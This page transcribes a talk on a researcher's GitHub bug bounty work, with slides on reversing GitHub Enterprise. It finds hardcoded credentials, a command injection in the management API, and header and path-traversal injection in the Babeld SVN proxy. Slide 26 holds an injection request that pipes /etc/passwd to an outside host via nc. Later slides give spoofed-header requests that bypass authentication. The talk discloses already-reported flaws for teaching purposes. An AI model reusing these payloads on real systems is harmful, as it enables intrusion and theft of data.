Год в Github bugbounty, опыт участия
1 like322 views
GitHub Bug Bounty Experience provides an overview of the author's experience participating in GitHub's bug bounty program. The summary includes 3 key points: 1) The author is an information security engineer who participated in GitHub's bug bounty program to find vulnerabilities for monetary rewards, as well as for fun and the challenge. 2) Through analyzing GitHub Enterprise's virtual machine images and Ruby applications, the author discovered several security issues like hardcoded credentials, lack of input validation, and potential for command injection. 3) By probing the Babeld SVN proxy service, the author found ways to bypass authentication and potentially cause denial of service through excessive requests.
![Blackbox -> Whitebox
17
require "ruby_concealer.so“
_ruby_concealer__
"xx9CrxCCMOx830x18x00xE0x17xC4x96x8Fx96x0Fx85mxCERx92xC5,Frx
17xB3xF81x0F"tx8EbexA1#x1Ex86']2x0F^<x18xBDxF8xDBxF5xF9x01xCF
rxA6xA8xB2x1FfGxC8%1xDEJ0XxC1xF4@xCC}bxAAxDFx06x8Ax92x13axB
8xF1xxD2xCELJxE9@x9CxC7xB1xCDxF6xBEK%
xEFx86x81Ux13v!qbxF3x15xD1xDDfPmxB2xD0xDC'wx01"x16vxACxFFcxB
Dx14xF0xF5xF1"xE6x90'2|xEEx11xF5<xE8xC0xCCexBCxDAUQx99x19x
03x15x81O.xADx16x87xE8pxB4xF8xF4NxABxFBx1Ex0Evx8BNxE5xD9x9Ah
xF6YxA9xA0txC6xDA[!4xE9ox85Mx7FxDESfxC0x9FxD4x04xFBxBBxC6x91S]
xD3x86}{x9BxF8xB5xCBbxD9]axC7x89xEAx97ixD2x92Qx1Ax8CuxC9x91
x83xA3xD7?txA5&xA9"
Красный цвет
не правильный](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-17-320.jpg)
![enterprise-manage/current/lib/manage/api.rb
25
get "/cluster-preflight" do
command = "sudo /usr/bin/env CLUSTER_ROLE=#{params[:type]}
/usr/local/share/enterprise/ghe-preflight-check“
if system(command)
status 200
else
status 400
`#{command}`
end
end
Красный цвет
не правильный](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-25-320.jpg)
![27
get "/cluster-preflight“ do
role = params[:type]
cluster_roles = %w(git web job mysql elasticsearch redis memcache metrics pages
storage)
if cluster_roles.include?(role)
output = IO.popen(["sudo", "/usr/bin/env", "CLUSTER_ROLE=#{role}",
"/usr/local/share/enterprise/ghe-preflight-check"]) { |io| io.read }
if $?.exitstatus == 0
status 200
else
status 400
output
end
else
…](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-27-320.jpg)
![src/util.c
32
assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char)));
strncpy(line, read_buffer, strlen(read_buffer));
// See if we need to finish reading the line
while(line[strlen(line) - 1] != 'n') {
rc = fgets(read_buffer, sizeof(read_buffer), f);
if((rc == NULL) && feof(f)) {
// We got everything that we can get, so we'll
// call it a "line"
break;
}
…
Красный цвет
не правильный](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-32-320.jpg)
![src/util.c
33
assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char)));
strncpy(line, read_buffer, strlen(read_buffer));
// See if we need to finish reading the line
while(strlen(line) && line[strlen(line) - 1] != 'n') {
rc = fgets(read_buffer, sizeof(read_buffer), f);
if((rc == NULL) && feof(f)) {
// We got everything that we can get, so we'll
// call it a "line"
break;
}
…
Красный цвет
не правильный](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-33-320.jpg)
![39
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fbdfb6a923e <_IO_vfprintf_internal+126>: mov QWORD PTR [rbp-0x450],rax
0x7fbdfb6a9245 <_IO_vfprintf_internal+133>: mov rax,QWORD PTR [r15+0x10]
0x7fbdfb6a9249 <_IO_vfprintf_internal+137>: mov QWORD PTR [rbp-0x448],rax
=> 0x7fbdfb6a9250 <_IO_vfprintf_internal+144>: call 0x7fbdfb6ef750 <strchrnul>
0x7fbdfb6a9255 <_IO_vfprintf_internal+149>: and r13d,0x8000
0x7fbdfb6a925c <_IO_vfprintf_internal+156>: mov QWORD PTR [rbp-0x4b8],rax
0x7fbdfb6a9263 <_IO_vfprintf_internal+163>: mov QWORD PTR [rbp-0x4a0],rax
0x7fbdfb6a926a <_IO_vfprintf_internal+170>: je 0x7fbdfb6a92f0
<_IO_vfprintf_internal+304>
Guessed arguments:
arg[0]: 0x44bc45 ("duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu
client_sent=%lu ")
arg[1]: 0x25 ('%')](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-39-320.jpg)
![55
::ffff:127.0.0.1 - kyprizel,special-chars-here'"-
[21/Jan/2017:00:04:44 +0000] - "GET /kyprizel/reponame/
HTTP/1.0" 500 5 0.0027
at=exception class=Rugged::OSError message="Failed to
resolve path
'/data/repositories/4/nw/45/c4/8c/9/9.git,./../arbitary': No such
file or directory“](https://image.slidesharecdn.com/2-170705051113/85/Github-bugbounty-55-320.jpg)
Год в Github bugbounty, опыт участия
- 1. GitHub Bug Bounty Experience Eldar Zaitov
- 2. Whoami • Information Security Engineer at Yandex • LC↯BC / MSLC / Smoked Chicken CTF team • CTFtime.org maintainer 2
- 3. What is Bug Bounty? Companies pay money for finding security vulnerabilities in their services/software • Google Vulnerability Reward Program (VRP) • Facebook • Yandex (“Охота за ошибками”) • … • https://hackerone.com/ 3
- 4. Why GitHub? • We use it • Blackbox -> Whitebox (GitHub Enterprise) • Fun • Bounty 4
- 5. 01 › Available as Virtual Machine image at https://enterprise.github.com/ › 45 days trial included GitHub Enterprise
- 6. Virtual Machine Images • Hyper-V • OpenStack KVM () • VMWare ESXi • XEN 6
- 7. VMware ESXi to Virtual Box (RAW) 7 vbox-img convert --srcfilename ghe-disk1.vmdk --dstfilename ghe-disk1.raw --srcformat VMDK --dstformat RAW Красный цвет не правильный
- 8. 8
- 9. 9
- 11. 11 METHOD /path?querystring HTTP/1.1rn Host: hostnamern Connection: closern rnrn BODY Method: • GET • POST • PUT • DELETE • HEAD • …
- 12. Haproxy • HTTP • HTTPS • TCP 12
- 13. Babeld • SSH (libssh) • GIT (libgit) • SVN • HTTP (curl) 13
- 14. Slumlord • Subversion (SVN) protocol emulator acl ua_svn hdr_reg(User-Agent) -i ^SVN • No internal auth: HTTP_HUB_LOGIN HTTP_HUB_PATH 14
- 15. NGINX • Github Pages • Main Unicorns + private mode • Avatars • Enterprise Manage • Render • Media 15
- 16. 02 Ruby apps
- 17. Blackbox -> Whitebox 17 require "ruby_concealer.so“ _ruby_concealer__ "xx9CrxCCMOx830x18x00xE0x17xC4x96x8Fx96x0Fx85mxCERx92xC5,Frx 17xB3xF81x0F"tx8EbexA1#x1Ex86']2x0F^<x18xBDxF8xDBxF5xF9x01xCF rxA6xA8xB2x1FfGxC8%1xDEJ0XxC1xF4@xCC}bxAAxDFx06x8Ax92x13axB 8xF1xxD2xCELJxE9@x9CxC7xB1xCDxF6xBEK% xEFx86x81Ux13v!qbxF3x15xD1xDDfPmxB2xD0xDC'wx01"x16vxACxFFcxB Dx14xF0xF5xF1"xE6x90'2|xEEx11xF5<xE8xC0xCCexBCxDAUQx99x19x 03x15x81O.xADx16x87xE8pxB4xF8xF4NxABxFBx1Ex0Evx8BNxE5xD9x9Ah xF6YxA9xA0txC6xDA[!4xE9ox85Mx7FxDESfxC0x9FxD4x04xFBxBBxC6x91S] xD3x86}{x9BxF8xB5xCBbxD9]axC7x89xEAx97ixD2x92Qx1Ax8CuxC9x91 x83xA3xD7?txA5&xA9" Красный цвет не правильный
- 20. 20 # # Seriously, CC @github/appsec and @github/dotcom-security # if you need to touch this file # class ApplicationController after_filter :set_html_safe private # Overrides default CSP with the preview policy if enabled for current_user # # Returns nothing. def set_security_headers if preview_features? SecureHeaders.use_secure_headers_override(request, :preview_policy) end …
- 21. Main GitHub application • 1.5M+ LOC • Sinatra • Secure randoms, MsgPack serializer • Pretty clean code 21
- 22. Hardcoded credentials 22 auth = "apt:6YLkX******h0zXf" github_package_host = if hostname.end_with?(".iad.github.net") "packages.iad.github.net" else "packages-ext.iad.github.net" end set_up_source :id => "github", :deb => "https://#{auth}@#{github_package_host}/github-precise precise main", :key => "https://#{auth}@#{github_package_host}/pubkey.gpg?OCC30EA6" end Красный цвет не правильный
- 23. Hardcoded credentials 23 uri = URI.parse("https://secure.braintreepaymentgateway.com/api/transact.php") http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER if Rails.production? http.ca_file = "/usr/lib/ssl/certs/ca-certificates.crt" end params = { "transactionid" => transaction_id, "username" => "github", "password" => "g********6", … Красный цвет не правильный
- 24. Enterprise manage app • 8k+ LOC • The code is a mess 24
- 25. enterprise-manage/current/lib/manage/api.rb 25 get "/cluster-preflight" do command = "sudo /usr/bin/env CLUSTER_ROLE=#{params[:type]} /usr/local/share/enterprise/ghe-preflight-check“ if system(command) status 200 else status 400 `#{command}` end end Красный цвет не правильный
- 26. 26 GET /setup/api/cluster- preflight?type=x%3Bcat+%2Fetc%2Fpasswd+%7C+nc+kyprizel.net+1114%3B HTTP/1.1 Host: 10.0.0.22:8443 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
- 27. 27 get "/cluster-preflight“ do role = params[:type] cluster_roles = %w(git web job mysql elasticsearch redis memcache metrics pages storage) if cluster_roles.include?(role) output = IO.popen(["sudo", "/usr/bin/env", "CLUSTER_ROLE=#{role}", "/usr/local/share/enterprise/ghe-preflight-check"]) { |io| io.read } if $?.exitstatus == 0 status 200 else status 400 output end else …
- 28. 03 › Binary › Edge Binary world
- 29. csgtools 29 Constructive Solid Geometry GEM https://github.com/sshirokov/csgtool
- 30. 30
- 31. 31
- 32. src/util.c 32 assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
- 33. src/util.c 33 assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(strlen(line) && line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
- 34. Babeld as SVN proxy 34 haproxy babeld github app slumlord POST /auth GET /repo
- 35. Babeld SVN auth 35 POST /auth/ HTTP/1.1 Host: local.github.test Content-Type: application/x-www-form-urlencoded Content-Length: 123 username=xxx&password=xxx&domain=local.github.test
- 36. Babeld 36 GET /AAAAx512/BBBBx512/ HTTP/1.1 Host: local.github.test Host: someother.host Authorization: Basic … User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
- 37. Babeld SVN auth 37 POST /auth/ HTTP/1.1 Host: local.github.test Content-Type: multipart/form-data Content-Length: 123 username=xxx&password=xxx&domain=someother.host
- 38. Babeld DoS 38 GET /AAAAx512/BBBBx512/ HTTP/1.1 Host: local.github.test Host: someother.host Authorization: Basic … X-GITHUB-REQUEST-ID: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
- 39. 39 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fbdfb6a923e <_IO_vfprintf_internal+126>: mov QWORD PTR [rbp-0x450],rax 0x7fbdfb6a9245 <_IO_vfprintf_internal+133>: mov rax,QWORD PTR [r15+0x10] 0x7fbdfb6a9249 <_IO_vfprintf_internal+137>: mov QWORD PTR [rbp-0x448],rax => 0x7fbdfb6a9250 <_IO_vfprintf_internal+144>: call 0x7fbdfb6ef750 <strchrnul> 0x7fbdfb6a9255 <_IO_vfprintf_internal+149>: and r13d,0x8000 0x7fbdfb6a925c <_IO_vfprintf_internal+156>: mov QWORD PTR [rbp-0x4b8],rax 0x7fbdfb6a9263 <_IO_vfprintf_internal+163>: mov QWORD PTR [rbp-0x4a0],rax 0x7fbdfb6a926a <_IO_vfprintf_internal+170>: je 0x7fbdfb6a92f0 <_IO_vfprintf_internal+304> Guessed arguments: arg[0]: 0x44bc45 ("duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") arg[1]: 0x25 ('%')
- 40. 40 gdb-peda$ bt #0 _IO_vfprintf_internal (s=s@entry=0x7fbdfc8224d0, format=format@entry=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", ap=ap@entry=0x7fbdfc822638) at vfprintf.c:1315 #1 0x00007fbdfb6d5409 in _IO_vsnprintf (string=0x7fbdfc8228ef "", maxlen=<optimized out>, format=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", args=args@entry=0x7fbdfc822638) at vsnprintf.c:119 #2 0x00007fbdfb6b3e22 in __snprintf (s=<optimized out>, maxlen=<optimized out>, format=<optimized out>) at snprintf.c:33 #3 0x0000000000417314 in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:83 ...
- 41. 41 ... #250 0x0000000000417b8f in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:212 #251 0x000000000041272b in http_generic_client_thread (ctx=0x44bc45, handler=0x191) at http-server.c:303 #252 0x000000000041886b in http_svn_client_thread (arg=<optimized out>) at http- server-svn.c:42 #253 0x00007fbdfba160a4 in start_thread (arg=0x7fbdfc8e1700) at pthread_create.c:309 #254 0x00007fbdfb74b5dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
- 42. Babeld SVN auth • Login • User • Push-URL • Commit-URL • Hub-Path 42
- 43. Babeld SVN proxy 43 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
- 44. 44
- 45. 45
- 46. 46
- 47. 47
- 48. Whitelisted headers 48 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
- 49. 49 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
- 50. 50 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
- 51. 51 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
- 52. 52 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 User-Agent: AAAAx980 … rnrn HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitary
- 53. 53 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 …
- 54. 54 User-Agent: AAAAx340 HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitrary We control headers rnrn We also control request body
- 55. 55 ::ffff:127.0.0.1 - kyprizel,special-chars-here'"- [21/Jan/2017:00:04:44 +0000] - "GET /kyprizel/reponame/ HTTP/1.0" 500 5 0.0027 at=exception class=Rugged::OSError message="Failed to resolve path '/data/repositories/4/nw/45/c4/8c/9/9.git,./../arbitary': No such file or directory“